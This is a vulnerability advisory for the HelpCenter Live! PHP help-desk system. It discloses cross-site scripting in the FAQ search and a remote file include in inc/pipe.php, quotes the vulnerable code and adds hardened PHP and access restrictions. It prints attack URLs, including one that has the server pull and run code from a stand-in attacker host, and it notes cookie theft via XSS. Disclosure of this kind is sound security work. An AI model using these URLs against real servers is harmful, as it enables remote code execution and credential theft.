HelpCenter Live! Multiple Vulnerabilities
Vendor: Michael Bird
Product: HelpCenter Live!
Version: <= 1.2.6
Website: http://www.helpcenterlive.com/
BID: 12105
CVE: CVE-2004-2601
OSVDB: 12597 12598 12631
SECUNIA: 13652
Description:
Help Center Live is a "live" help desk system written in PHP with a MySQL database backend that combines Live Support, Trouble Tickets and an FAQ in one project. It is a very popular application, especially with web hosts and similar services.


Cross Site Scripting:
Cross site scripting exists in Help Center Live because user supplied input is not checked properly before being output. Below is an example.

http://path/faq/index.php?find=[CODEGOESHERE]&search=Search

This vulnerability could be used to steal cookie-based authentication credentials within the scope of the current domain, or to render hostile code in a victim's browser.


File Include Vulnerability:
There is a very dangerous file include vulnerability in Help Center Live. An attacker can run system commands with the rights of the web server by including a malicious remote file:

http://path/inc/pipe.php?HCL_path=http://attacker

All an attacker has to do is host any malicious PHP code at that location and it will be executed. Here is the vulnerable code, located in inc/pipe.php:

$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage); 


Since pipe.php is called directly, $HCL_path can be supplied by the client and the file is included as long as register_globals is turned on in the PHP configuration. There is a similar issue in skin.php, which in some circumstances could be used to gain access to arbitrary local files and possibly more:

// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
	$SKIN_inner = "default";
}

// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
// e.g. blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);



Solution:
I have contacted the developer, but received no answer. My advice would be for any users running Help Center Live to deny direct access to the /inc/ directory, as direct access to it is not needed. This can be accomplished on the Apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.
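As an added example (not the vendor's code), here is how the two includes shown above could be hardened in PHP: the include base is derived from the script's own location instead of the client-controllable $HCL_path global, the skin path components are validated before being used, and the FAQ search term is escaped before being echoed. The function and constant names (hcl_base_path, load_skin_file, HCL_ENTRY) are assumptions.

```php
<?php
// Added example: hardened versions of the patterns quoted in the advisory.
// hcl_base_path(), load_skin_file() and HCL_ENTRY are assumed names, not the vendor's.

// Refuse direct requests to files under /inc/: the application entry point
// defines HCL_ENTRY before including them; a direct hit to inc/pipe.php does not.
if (!defined('HCL_ENTRY')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access is not permitted.');
}

// Derive the application root from the file system, never from $HCL_path,
// which register_globals lets a client set via ?HCL_path=...
function hcl_base_path(): string
{
    return dirname(__DIR__);
}

// Build the skin path only from validated components: each must be a single
// path segment of letters, digits, underscore or hyphen, so "../" cannot appear.
function load_skin_file(string $skinName, string $skinType, ?string $inner = null): string
{
    $parts = [$skinName, $skinType];
    if ($inner !== null) {
        $parts[] = $inner;
    }
    foreach ($parts as $part) {
        if (!preg_match('/^[A-Za-z0-9_-]+$/', $part)) {
            throw new InvalidArgumentException('Invalid skin component');
        }
    }
    $suffix = $inner === null ? '' : '_inner_' . $inner;
    $file = hcl_base_path() . '/inc/skins/' . $skinName . '/' . $skinType . $suffix . '.hcl';

    // realpath() resolves symlinks and ".." and returns false for missing files,
    // so this final check confines reads to the skins directory.
    $real = realpath($file);
    $skinsDir = realpath(hcl_base_path() . '/inc/skins');
    if ($real === false || $skinsDir === false
        || strpos($real, $skinsDir . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('Skin file not found');
    }
    return file_get_contents($real);
}

// Fixed include path for DecodeMessage.inc, replacing the $HCL_path-based version.
require_once hcl_base_path() . '/inc/DecodeMessage.inc';

// FAQ search: escape the user-supplied "find" term before echoing it into HTML.
$find = isset($_GET['find']) ? (string) $_GET['find'] : '';
echo 'Results for: ' . htmlspecialchars($find, ENT_QUOTES, 'UTF-8');
```

Together with the .htaccess restriction described above, the HCL_ENTRY guard means a direct request to inc/pipe.php is refused even on a server where register_globals is still enabled.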


Credits:
James Bercegay of the GulfTech Security Research Team